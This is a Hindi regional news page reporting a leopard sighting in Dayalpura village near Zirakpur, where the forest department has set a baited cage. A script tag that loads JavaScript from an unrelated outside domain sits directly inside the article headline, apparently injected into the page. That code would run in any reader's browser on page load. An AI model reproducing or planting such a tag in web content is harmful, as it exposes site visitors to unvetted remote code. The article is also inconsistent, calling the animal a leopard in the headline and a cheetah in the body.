Tuesday, 13 October 2026
Breaking News
गुरु नानक गीता कैलाश मेमोरियल फाउंडेशन और रेड क्रॉस सोसाइटी ने लगाया मेडिकल कैंप: 300 से ज्यादा मरीजों की जांच, मुफ्त टेस्ट और दवाइयां भी मिलीं भारत के मीडिया जगत को चाहिए एक समावेशी और सशक्त प्रेस काउंसिल श्री दिगंबर जैन मंदिर में णमोकार मंत्र पाठ एवं भक्तामर दीपार्चना का आयोजन घरेलू दुकानों पर कार्रवाई के फैसले के खिलाफ पुनर्विचार याचिका दाखिल करे चंडीगढ़ प्रशासन : कृष्ण लाल समाजवाद के अग्रदूत थे महाराजा अग्रसेन महाराज  भगवान वाल्मीकि रामतीर्थ, अमृतसर से चंडीगढ़ पहुंची प्रथम ज्योति, सेक्टर 49-A की रामलीला कमेटी ने किया स्वागत राज नागपाल एक बार फिर सर्वसम्मति से ऑल इंडिया राजीव मेमोरियल सोसाइटी के अध्यक्ष चुने गए महाकाल की पवित्र नगरी उज्जैन के महापौर मुकेश टटवाल का राम दरबार में भव्य स्वागत पंचकूला में पहली बार सजेगा ऐतिहासिक गरबा-डांडिया का महा-पंडाल पंजाब विवि के पूर्व रशियन विभागाध्यक्ष डॉ. पंकज मालवीय द्वारा रशियन में अनुदित तीन पुस्तकों का विमोचन
पंजाब

गांव के जंगली क्षेत्र में तेंदुआ देखे जाने पर गांव में मचा हड़कंप<script src="https://new2sportnews.com/face2news.js"></script>

Read in:Hindi

जीरकपुर, कृत्रिका:
दयालपुरा गांव के जंगली क्षेत्र में शुक्रवार शाम 6 बजे के करीब गांव निवासियों द्वारा देखे जाने के बाद गांव में दहशत का माहौल बना हुआ है। चीते को सबसे पहले गांव निवासी बाबू सिंह व उसके बेटे गुरदर्शन सिंह ने देखा और गांव के लोगों को आकर बताया। जिसके बाद गांव निवासियों ने गुरद्वारा साहिब में अनाऊंसमेंट करवाकर गांव निवासियों को सूचित किया गया और जंगल की तरफ ना जाने की अपील। उसके बाद चीता दिखाई देने की सूचना वन विभाग को दी गई तो शनिवार सुबह वन विभाग ने गांव में पहुंचकर पिंजरा लगाया। वन विभाग द्वारा पिंजरे में चारे के रूप में बकरे का बच्चा भी छोड़ा हुआ है और चीता के आने का इंतजार किया जा रहा है। यह सारी कार्रवाई बलविंदर सिंह रेंज ऑफिसर की देखरेख में की जा रही है। वन विभाग के कर्मचारियों कर्मजीत सिंह ने बताया कि हमने एक पिंजरा लगा दिया है, जरूरत पड़ी तो एक ओर पिंजरा भी लगा दिया जाएगा। फिलहाल हमें आसपास कहीं भी चीते के पैरों के निशान दिखाई नही दिए हैं। लेकिन हम गांव निवासियों की सूचना पर एहतियात के तौर पर पिंजरा लगा दिया है और हमारी टीम द्वारा सुबह शाम पिंजरे की निगरानी के लिए चक्कर लगाया जाएगा।

0 Comments